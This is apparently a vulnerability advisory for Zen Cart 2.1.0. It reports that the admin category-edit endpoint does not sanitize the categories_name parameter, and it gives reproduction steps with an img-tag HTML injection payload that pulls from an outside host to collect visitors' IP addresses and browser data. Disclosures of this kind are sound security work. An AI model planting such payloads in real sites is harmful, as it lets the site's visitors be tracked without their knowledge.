Zencart | Information disclosure via HTML injection

Information

Software Type Web App
Software Name Zen-Cart
Affected Version 2.1.0
Software Vendor Zen Ventures, LLC
Software Link https://github.com/zencart/zencart
Severity Medium
CVSS Score 4.8
CVE Link N/A
Affected Assets 30171+
Date of Discovery Jan 9th, 2025
PoC Exploit N/A

Description

The [/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing] endpoint has a listing of catalogs of categories of products. Each category can be modified through [/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category] endpoint.

This endpoint doesn't sanitize data passed to [categories_name[1]] parameter, an attacker could inject HTML here to grab IP and browser data of other users.

 

Reproduce

Open a category for editing:

/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category

Use the following payload inside [categories_name[1]] parameter:

<img/src=http://127.0.0.1:1718>

Now anytime someone browses the categories page, you will be able to collect their IP or browser info:

/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing

 

Proof of Concept (PoC) Video


Posted on: May 24, 2025 06:06 AM